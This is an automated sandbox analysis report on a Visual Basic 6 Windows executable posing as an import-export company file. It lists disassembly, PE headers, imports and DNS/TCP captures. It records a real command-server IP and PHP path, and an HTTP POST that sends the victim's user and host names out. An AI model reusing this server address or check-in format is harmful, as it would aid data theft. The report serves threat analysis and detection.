add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 09h
add byte ptr [eax], al
pop ss
or dword ptr [eax], eax
add byte ptr [eax], al
or al, byte ptr [eax]
push 00000075h
js 00007F0E0C951836h
popad
jo 00007F0E0C951831h
jnc 00007F0E0C95182Bh
je 00007F0E0C9517C2h
or eax, 46000B01h
outsd
jc 00007F0E0C951827h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20b14	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0xbfc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2010c	0x21000	False	0.378292199337	data	6.67763542403	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x11bc	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0xbfc	0x1000	False	0.310791015625	data	3.24011988097	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24354	0x8a8	data
RT_GROUP_ICON	0x24340	0x14	data
RT_VERSION	0x240f0	0x250	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaR4Str, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaR8Str, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	Tolip
FileVersion	1.00
CompanyName	Intersection Road
Comments	Intersection Road
ProductName	Gender7
ProductVersion	1.00
OriginalFilename	Tolip.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 08:12:26.496088028 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:26.639414072 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:26.639549971 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:26.643964052 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:26.786485910 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:26.786619902 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:26.930691957 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.484879971 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.484932899 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.484957933 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.485121012 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.485558033 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.485590935 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.485613108 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.485644102 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.485672951 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.485712051 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.485745907 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.485831022 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.486145020 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.486296892 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.486567974 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.486604929 CEST	80	49753	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.486675024 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.499150991 CEST	49753	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.841173887 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.983741999 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:27.983902931 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:27.995006084 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.137423038 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.138072014 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.280507088 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.866781950 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.866821051 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.866832018 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.867017031 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.867089987 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.867142916 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.867163897 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.867290020 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.868438005 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.868715048 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.868745089 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.868757963 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.868798971 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.868832111 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.868849039 CEST	80	49754	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:28.869251966 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.869268894 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.869271994 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.869273901 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:28.869276047 CEST	49754	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:29.057308912 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:29.199930906 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:29.200562000 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:29.223743916 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:29.366354942 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:29.366456985 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:29.508951902 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140487909 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140530109 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140542984 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140723944 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.140746117 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140779972 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140794992 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.140938044 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.141019106 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.141048908 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.141063929 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.141130924 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.141268969 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.141295910 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.141438961 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.142525911 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.158453941 CEST	80	49755	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.159250975 CEST	49755	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.481532097 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.624118090 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.624241114 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.628950119 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.771459103 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:30.783184052 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:30.925868988 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.508862972 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.508893013 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.508903027 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509040117 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:31.509071112 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509094954 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509108067 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509177923 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:31.509356976 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509377003 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509387970 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509448051 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:31.509663105 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509704113 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.509771109 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:31.510674953 CEST	80	49756	185.227.139.18	192.168.2.3
Aug 3, 2021 08:12:31.510808945 CEST	49756	80	192.168.2.3	185.227.139.18
Aug 3, 2021 08:12:35.708242893 CEST	49756	80	192.168.2.3	185.227.139.18

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 08:06:02.561711073 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:02.587394953 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:03.523422003 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:03.549778938 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:04.874326944 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:04.906574965 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:07.017973900 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:07.053630114 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:08.382019043 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:08.416337013 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:10.325537920 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:10.350493908 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:15.376889944 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:15.402035952 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:17.162555933 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:17.190224886 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:27.280474901 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:27.307948112 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:29.274162054 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:29.309591055 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:30.392318964 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:30.428770065 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:31.567733049 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:31.604064941 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:32.395380974 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:32.421241045 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:34.095387936 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:34.122996092 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:35.255598068 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:35.293929100 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:36.004561901 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:36.054364920 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:36.325654984 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:36.350203037 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 08:06:38.112377882 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:06:38.144728899 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:06.873698950 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:06.909287930 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:07.608310938 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:07.643776894 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:08.167875051 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:08.203213930 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:08.591665983 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:08.626812935 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:09.066729069 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:09.099097013 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:09.610244036 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:09.635169983 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:10.153930902 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:10.186781883 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:10.913202047 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:10.938419104 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:12.204030991 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:12.239463091 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:12.693355083 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:12.727677107 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:13.902677059 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:13.944535971 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:22.200280905 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:22.240190029 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 08:07:41.223428011 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:07:41.272118092 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 3, 2021 08:10:57.579036951 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:10:57.614332914 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 08:10:58.213329077 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:10:58.247992992 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 08:11:06.469744921 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:11:06.503454924 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 3, 2021 08:11:10.841893911 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:11:10.874582052 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 3, 2021 08:11:11.153975010 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:11:11.178591967 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 08:12:22.548403978 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:12:22.608761072 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 08:12:23.496463060 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:12:23.536290884 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 3, 2021 08:13:14.448586941 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 08:13:14.495676994 CEST	53	56803	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 08:12:22.548403978 CEST	192.168.2.3	8.8.8.8	0xb178	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Aug 3, 2021 08:12:23.496463060 CEST	192.168.2.3	8.8.8.8	0xf31d	Standard query (0)	mbdetq.dm.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
Aug 3, 2021 08:10:57.614332914 CEST	8.8.8.8	192.168.2.3	0xf08c	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net	CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 08:12:22.608761072 CEST	8.8.8.8	192.168.2.3	0xb178	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 08:12:23.536290884 CEST	8.8.8.8	192.168.2.3	0xf31d	No error (0)	mbdetq.dm.files.1drv.com	dm-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 08:12:23.536290884 CEST	8.8.8.8	192.168.2.3	0xf31d	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.227.139.18

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49753	185.227.139.18	80	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 08:12:26.643964052 CEST	5872	OUT	POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 185.227.139.18 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 976E9D7A Content-Length: 190 Connection: close
Aug 3, 2021 08:12:26.786619902 CEST	5872	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 38 00 31 00 35 00 39 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz181598DESKTOP-716T771k08F9C4E9C79A3B52B3F739430RTcgU
Aug 3, 2021 08:12:27.484879971 CEST	5874	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Aug 2021 06:12:26 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
